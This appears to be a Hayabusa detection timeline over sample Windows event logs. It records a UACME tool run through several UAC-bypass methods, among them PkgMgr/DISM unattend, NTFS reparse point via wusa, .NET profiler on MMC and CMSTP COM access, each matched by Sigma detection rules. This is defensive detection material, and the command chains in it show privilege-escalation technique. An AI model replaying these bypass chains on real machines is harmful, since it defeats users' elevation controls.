2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 23 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 406 000002806444C740 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" : Path: C:\Windows\System32\Dism.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 22 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC9C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC890 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC170 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471300 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 37 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 36 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471E00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dcomcnfg.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 38 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 398 000002806443AF40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 38",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 39 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 376 0000028064463A00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 41 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 00000280644BB040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 43 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 0000028064468040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 330 000002806444C490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
